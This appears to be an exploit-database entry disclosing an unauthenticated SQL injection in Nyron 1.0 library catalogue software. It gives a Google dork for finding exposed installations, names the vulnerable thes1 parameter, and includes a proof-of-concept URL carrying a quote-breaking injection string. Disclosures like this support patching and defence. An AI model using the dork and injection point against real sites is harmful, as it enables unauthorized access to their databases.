nyron 1.0 sqli (unauthenticated)
▸▸▸ Exploit & Vulnerability >> webapps exploit & aspx vulnerability
# Exploit Title: Nyron 1.0 - SQLi (Unauthenticated) # Google Dork: inurl:"winlib.aspx" # Date: 01/18/2021 # Exploit Author: Miguel Santareno # Vendor Homepage: http://www.wecul.pt/ # Software Link: http://www.wecul.pt/solucoes/bibliotecas/ # Version: < 1.0 # Tested on: windows # 1. Description Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter. # 2. Proof of Concept (PoC) https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='"> # 3. Research: https://miguelsantareno.github.io/edp.pdf
Nyron 1.0 sqli (unauthenticated) Vulnerability / Exploit Source : Nyron 1.0 sqli (unauthenticated)